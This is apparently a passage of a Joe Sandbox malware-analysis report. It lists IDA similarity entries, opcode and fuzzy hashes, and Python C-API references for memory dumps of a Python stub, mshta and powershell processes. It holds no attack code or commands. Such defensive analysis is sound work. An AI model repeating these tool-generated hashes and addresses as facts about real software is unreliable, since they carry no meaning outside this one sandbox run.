• Snapshot File: hcaresult_3_2_7ffbaaf00000_stub.jbxd
Similarity
• API ID: Object_$Dealloc$Track$CallFinalizedFinalizerFromInit
• String ID:
• API String ID: 689297262-0
• Opcode ID: 1105732f36dce22c784bb94101f1a7eff4ec4526eb5912b4a688f9a661355dbb
• Instruction ID: 45da036ff1fcf9598bc26a33c1df6beb474ad6f6389bf3691975bd5f54c85021
• Opcode Fuzzy Hash: 1105732f36dce22c784bb94101f1a7eff4ec4526eb5912b4a688f9a661355dbb
• Instruction Fuzzy Hash: B55195A6A1AB41C2EF1E9F76E88017467A8FF88B85F084175CE1D87354DF2ED4928350
APIs
• PyErr_NormalizeException.PYTHON310(?,?,00007FFBAAF34788,00001768,00000000,00007FFBAAF26A0D,?,?,?,?,00007FFBAAF07A8E), ref: 00007FFBAAF26881
• PyException_SetTraceback.PYTHON310(?,?,00007FFBAAF34788,00001768,00000000,00007FFBAAF26A0D,?,?,?,?,00007FFBAAF07A8E), ref: 00007FFBAAF268A3
• _Py_Dealloc.PYTHON310(?,?,00007FFBAAF34788,00001768,00000000,00007FFBAAF26A0D,?,?,?,?,00007FFBAAF07A8E), ref: 00007FFBAAF26934
• _Py_Dealloc.PYTHON310(?,?,00007FFBAAF34788,00001768,00000000,00007FFBAAF26A0D,?,?,?,?,00007FFBAAF07A8E), ref: 00007FFBAAF26948
• _Py_Dealloc.PYTHON310(?,?,00007FFBAAF34788,00001768,00000000,00007FFBAAF26A0D,?,?,?,?,00007FFBAAF07A8E), ref: 00007FFBAAF2695C
• _Py_Dealloc.PYTHON310(?,?,00007FFBAAF34788,00001768,00000000,00007FFBAAF26A0D,?,?,?,?,00007FFBAAF07A8E), ref: 00007FFBAAF2697F
• _Py_Dealloc.PYTHON310(?,?,00007FFBAAF34788,00001768,00000000,00007FFBAAF26A0D,?,?,?,?,00007FFBAAF07A8E), ref: 00007FFBAAF26995
• _Py_Dealloc.PYTHON310(?,?,00007FFBAAF34788,00001768,00000000,00007FFBAAF26A0D,?,?,?,?,00007FFBAAF07A8E), ref: 00007FFBAAF269AB
Memory Dump Source
• Source File: 00000003.00000002.1962008991.00007FFBAAF01000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FFBAAF00000, based on PE: true
• Associated: 00000003.00000002.1961973099.00007FFBAAF00000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962060335.00007FFBAAF34000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962091897.00007FFBAAF3F000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962127369.00007FFBAAF44000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffbaaf00000_stub.jbxd
Similarity
• API ID: Dealloc$Err_ExceptionException_NormalizeTraceback
• String ID:
• API String ID: 2316155915-0
• Opcode ID: 914f6b9baeb2aaca218c9e49dd1f2e8384bb7dbfd6bf696a98001349bd1f1839
• Instruction ID: c14ab03996049bb4040483331b90d2c695a863d1537d158173d19076605e47ee
• Opcode Fuzzy Hash: 914f6b9baeb2aaca218c9e49dd1f2e8384bb7dbfd6bf696a98001349bd1f1839
• Instruction Fuzzy Hash: 1C518DB6A0AF41C1DB9A8F35E854129B3A8FB58F94B188471CE9C83714CF3ED45AC720
APIs
Memory Dump Source
• Source File: 00000003.00000002.1962008991.00007FFBAAF01000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FFBAAF00000, based on PE: true
• Associated: 00000003.00000002.1961973099.00007FFBAAF00000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962060335.00007FFBAAF34000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962091897.00007FFBAAF3F000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962127369.00007FFBAAF44000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffbaaf00000_stub.jbxd
Similarity
• API ID: Dealloc
• String ID:
• API String ID: 3617616757-0
• Opcode ID: 2799e33cad7df17ad2b5f05c6cb7d5ad214d5bca6b6db2c5015863b4a719d01b
• Instruction ID: 1d7cd8a470a39c47cf87ff907f32d41f35896e983fa8b611cc56e8e9f012fb58
• Opcode Fuzzy Hash: 2799e33cad7df17ad2b5f05c6cb7d5ad214d5bca6b6db2c5015863b4a719d01b
• Instruction Fuzzy Hash: A34195B690AE05C1EB5FAF76E95007837B8FB54B56B1445B6CE2D83320CF2ED4428360
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1962008991.00007FFBAAF01000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FFBAAF00000, based on PE: true
• Associated: 00000003.00000002.1961973099.00007FFBAAF00000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962060335.00007FFBAAF34000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962091897.00007FFBAAF3F000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962127369.00007FFBAAF44000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffbaaf00000_stub.jbxd
Similarity
• API ID: Dict_Err_FormatNext
• String ID: %.200s() keywords must be strings$%s() got an unexpected keyword argument '%U'
                                                                                                                                                                                                                                    • API String ID: 4074058445-1494077997
                                                                                                                                                                                                                                    • Opcode ID: 8ffa3fa0e70fece9eb992863e8a0e606aa77c9d3c2f011a188a14575dc8fe9be
                                                                                                                                                                                                                                    • Instruction ID: 3f10b926a914fcb42b5fce0d8ab6e399514633f11f1fa0b0b41460cba9ab1198
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8ffa3fa0e70fece9eb992863e8a0e606aa77c9d3c2f011a188a14575dc8fe9be
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8831D4A2A19A41C1E7859F35F8407A9B3A4FBD8B85F545071EE8E83714CF3ED486C720
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1962008991.00007FFBAAF01000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FFBAAF00000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1961973099.00007FFBAAF00000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962060335.00007FFBAAF34000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962091897.00007FFBAAF3F000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962127369.00007FFBAAF44000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7ffbaaf00000_stub.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CallErr_Recursive$EnterLeaveOccurredString
                                                                                                                                                                                                                                    • String ID: while calling a Python object$NULL result without error in PyObject_Call
                                                                                                                                                                                                                                    • API String ID: 1825350209-1256585865
                                                                                                                                                                                                                                    • Opcode ID: 3e0c1f3b583ed904d77199725b658d8ca63907b1c178fa783aee72da0b5ecc70
                                                                                                                                                                                                                                    • Instruction ID: 8ae8ef7db59eecd5a38627c2d9db0e07017ba8eb52d1cb9883a4072df0c1505a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e0c1f3b583ed904d77199725b658d8ca63907b1c178fa783aee72da0b5ecc70
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D118691B09A42C1EF499B36F4541696754FB84FC5F085075DE1D83754DF2EE48BC320
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1962008991.00007FFBAAF01000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FFBAAF00000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1961973099.00007FFBAAF00000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962060335.00007FFBAAF34000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962091897.00007FFBAAF3F000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962127369.00007FFBAAF44000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7ffbaaf00000_stub.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Dealloc$AttrMethod_Object_SubtypeTuple_Type_
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2838696399-0
                                                                                                                                                                                                                                    • Opcode ID: 75c07022fa956bfcc9d8b6180236dff9748b1f2626edc6a3add62eacb3b3da0d
                                                                                                                                                                                                                                    • Instruction ID: 8db1805b8eb1ca309d0a522a971697fb0df383844ad3ebc0beb7908ef0144cd3
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 75c07022fa956bfcc9d8b6180236dff9748b1f2626edc6a3add62eacb3b3da0d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D5183F2A0AB41C1EB6A9F35E46017967A8EF44F81F0844B5CE5D83794DF3EE4468360
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1962008991.00007FFBAAF01000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FFBAAF00000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1961973099.00007FFBAAF00000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962060335.00007FFBAAF34000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962091897.00007FFBAAF3F000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962127369.00007FFBAAF44000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7ffbaaf00000_stub.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Dealloc$ClearErr_ImportImport_LevelList_ModuleObject
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 449435975-0
                                                                                                                                                                                                                                    • Opcode ID: 4d4f709af908074a74f8ba25bd54145c92cc616446c139868dc36c581aea49ca
                                                                                                                                                                                                                                    • Instruction ID: 981d79fcc8feb4a143d3d44553eb34b0d1abbbaa81b41ae82c96836d58f69c08
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4d4f709af908074a74f8ba25bd54145c92cc616446c139868dc36c581aea49ca
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 98313C75A0AB89C1EB4A9F35E8942A87368FB44F99F084075CE5D47764DF2FE056C320
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1962008991.00007FFBAAF01000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FFBAAF00000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1961973099.00007FFBAAF00000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962060335.00007FFBAAF34000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962091897.00007FFBAAF3F000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962127369.00007FFBAAF44000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7ffbaaf00000_stub.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Err_$DeallocNoneState_StringThreadUnchecked
                                                                                                                                                                                                                                    • String ID: can't send non-None value to a just-started generator
                                                                                                                                                                                                                                    • API String ID: 969891223-3187425046
                                                                                                                                                                                                                                    • Opcode ID: 6277c8053d5b532fb4994edc4439885c69d64f8ad4eefc0abb4356ded84228b3
                                                                                                                                                                                                                                    • Instruction ID: a18bad6578183a3060afd431f9e9f905926245238d42e93f79aa5e969bed4df1
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6277c8053d5b532fb4994edc4439885c69d64f8ad4eefc0abb4356ded84228b3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 663170A2A06A41C2EB5A9B36E55036873A4FB48B84F045071CF5DC7754DF3DE4A68320
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1962008991.00007FFBAAF01000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FFBAAF00000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1961973099.00007FFBAAF00000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962060335.00007FFBAAF34000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962091897.00007FFBAAF3F000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962127369.00007FFBAAF44000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7ffbaaf00000_stub.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Err_Format
                                                                                                                                                                                                                                    • String ID: %.200s() needs an argument$%.200s() takes exactly one argument (%zd given)$%.200s() takes no keyword arguments
                                                                                                                                                                                                                                    • API String ID: 376477240-2104551967
                                                                                                                                                                                                                                    • Opcode ID: c16e0fcdc57aa5166907a82d8846078a17deff2cfcb021dc2d73204346a6751f
                                                                                                                                                                                                                                    • Instruction ID: 9568182994f0aa22c246581a4fc6c9d5477d70585942e290498bce39b5cd4150
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c16e0fcdc57aa5166907a82d8846078a17deff2cfcb021dc2d73204346a6751f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ED1193E5E0AA42C1EB1E9B36C4902F413A5BB45B95FD40171CD2E87390DE6FD59B8320
                                                                                                                                                                                                                                    APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1962008991.00007FFBAAF01000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FFBAAF00000, based on PE: true
• Associated: 00000003.00000002.1961973099.00007FFBAAF00000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962060335.00007FFBAAF34000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962091897.00007FFBAAF3F000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962127369.00007FFBAAF44000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffbaaf00000_stub.jbxd
Similarity
• API ID: Err_S_snprintfWarn
• String ID: aiohttp._http_parser$compile time Python version %d.%d of module '%.100s' %s runtime version %d.%d$does not match
• API String ID: 1038695789-940319404
APIs
Similarity
• API ID: Dealloc$State_ThreadUnchecked
• String ID:
• API String ID: 3754167505-0
APIs
Strings
Similarity
• API ID: DeallocErr_String
• String ID: function's dictionary may not be deleted$setting function's dictionary to a non-dict
• API String ID: 1259552197-2577330722
APIs
Similarity
• API ID: AttrObject_$DisableEnableReadyType_
• String ID:
• API String ID: 3217214912-0
APIs
Similarity
• API ID: Tuple_$CallDeallocObject_SizeSlice
• String ID:
• API String ID: 387090426-0
APIs
Strings
Similarity
• API ID: Dict_Size
• String ID: __init__$aiohttp._http_parser.RawRequestMessage.__init__
• API String ID: 1288431816-4042305137
APIs
Strings
Similarity
• API ID: DeallocErr_String
• String ID: __name__ must be set to a string object
• API String ID: 1259552197-1372955150
                                                                                                                                                                                                                                    • Opcode ID: 9d01d9c6a468e975fbb5e1542fedb4de887afaa88ef3e9b2b7a58de9fc82d48c
                                                                                                                                                                                                                                    • Instruction ID: 9bd953012dc6dbe0c218d7f681d18d94a9ac54fc86a004ec30f567c095fcdc8b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9d01d9c6a468e975fbb5e1542fedb4de887afaa88ef3e9b2b7a58de9fc82d48c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 35F036F5A07A42C1DA4EEF35D85017423A4EF44B96F544571CE2D86250CE2ED49A8320
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1962008991.00007FFBAAF01000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FFBAAF00000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1961973099.00007FFBAAF00000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962060335.00007FFBAAF34000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962091897.00007FFBAAF3F000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962127369.00007FFBAAF44000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7ffbaaf00000_stub.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: DeallocErr_String
                                                                                                                                                                                                                                    • String ID: __qualname__ must be set to a string object
                                                                                                                                                                                                                                    • API String ID: 1259552197-2284195966
                                                                                                                                                                                                                                    • Opcode ID: 9329c64500ab0b39ddaa233be4cff1995aae19876241e79bceb2742aa797885e
                                                                                                                                                                                                                                    • Instruction ID: 792d0d914d578497b6eb2266a5762c5faf630150ef29098290b70d2d4f456a1b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9329c64500ab0b39ddaa233be4cff1995aae19876241e79bceb2742aa797885e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F4F096F9A06A02C1DA0EAB35D8501B423A4FF54B99F544271CD2D82260CF2ED05B8321
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000D.00000003.1664733778.0000025C41CC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000025C41CC0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_3_25c41cc0000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                                    • Instruction ID: 42f6405eb7c50f96d842e790e2d3132bfe546bcb42af2963d39aabe43a523067
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FD900208495A0759D41415950C5965C50406388151FE444C04456A0244F45D06E65156
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000038.00000002.1902822187.00007FFB49710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB49710000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_7ffb49710000_powershell.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: f3750f62cfbc664f03a496f9bb06090b02803ce91c25948379c15f9e82e7c00e
                                                                                                                                                                                                                                    • Instruction ID: 34d579d208efc5bc16c0312eca62031204b6ebeaabe84969eec901be8e3e3916
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f3750f62cfbc664f03a496f9bb06090b02803ce91c25948379c15f9e82e7c00e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 64622AA2A0DB870FE75AAF38D8561B57BE1EF46250B0801FBD48DC7293DE199C05C396
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000038.00000002.1902822187.00007FFB49710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB49710000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_7ffb49710000_powershell.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e4c3bd0d908d34e15e1a52b36bf76236446b7cf18717898dcbb7b8a9dbbece24
                                                                                                                                                                                                                                    • Instruction ID: 5e6c7c8de4d608f176069f5e57fd1f65554a26d46ac1680cd221edbdf95492fc
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e4c3bd0d908d34e15e1a52b36bf76236446b7cf18717898dcbb7b8a9dbbece24
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 05612AB2E1EA8B4FE7A9AE3C985657577D0EF95390B0801BAD48DC32D2DE19DC048345
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000038.00000002.1902822187.00007FFB49710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB49710000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_7ffb49710000_powershell.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 29265085f1fda7df59c4b5d1760d724e433ebe53974b271fa66c8813aca79132
                                                                                                                                                                                                                                    • Instruction ID: 8341dc8fad5a2ef0ef020b6cecf4c197be6b05d4ad61d18a0b9b4aefd1f3a136
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 29265085f1fda7df59c4b5d1760d724e433ebe53974b271fa66c8813aca79132
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 664127E2E1EE470BF39DAE38865717866D2EF453A0B4801B9D4CDC32E6DF199C059349
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000038.00000002.1902822187.00007FFB49710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB49710000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_7ffb49710000_powershell.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: c988a44e9495d3b38950a3434e0fc97ae0961602e1ded6cde6318fc410cb03c6
                                                                                                                                                                                                                                    • Instruction ID: 3fbe24cef4adf3496d82a8615982b8f4067375f99d54638f875195ddd44d45c6
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c988a44e9495d3b38950a3434e0fc97ae0961602e1ded6cde6318fc410cb03c6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FF31E2E2E1EA838FF79DAF78899717866D0EF4529074801BAE4CDC32D2EE1D9C048345
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000038.00000002.1902822187.00007FFB49710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB49710000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_7ffb49710000_powershell.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: f897ae35106259eb10fe843f16da3eece5370ab8139f305b5737ee7323dc2ac2
                                                                                                                                                                                                                                    • Instruction ID: 0c55c87171f52913c3ad46b7a3bcf45d6370d26538427c0cc92aaa9c90e2ca38
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f897ae35106259eb10fe843f16da3eece5370ab8139f305b5737ee7323dc2ac2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B21D8B6A1CA470FE798EE28E9825B477D1FF88750B444275D14DC3386CE24AC4643C9
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000038.00000002.1901190571.00007FFB49640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB49640000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_7ffb49640000_powershell.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 6ef34e9812a99c34b771e7d9ff2f8b08d45973efefe44c61f27bbc15d5f97d4e
                                                                                                                                                                                                                                    • Instruction ID: 204f3fc9c871dbd3e14311b44d8454619dd6a022d0ef9b0a2d61f5a4a98f18da
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ef34e9812a99c34b771e7d9ff2f8b08d45973efefe44c61f27bbc15d5f97d4e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A01A77010CB0C4FD748EF0CE451AA6B7E0FB85324F10056DE58AC3661D632E882CB45
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000038.00000002.1902822187.00007FFB49710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB49710000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_7ffb49710000_powershell.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: eb370e69879ef1b0368aab4a65e577fb668231c054e0d2786547765a8fcc8676
                                                                                                                                                                                                                                    • Instruction ID: f3853e276cbe895be2102f68fb25c6c844f59e5d0c29d30211ab23b49b205295
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb370e69879ef1b0368aab4a65e577fb668231c054e0d2786547765a8fcc8676
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6AE026A3F1E93E0BB3A2BD6C64072F4A2C0DF5867074801B3D84CC3692EE059C1003C6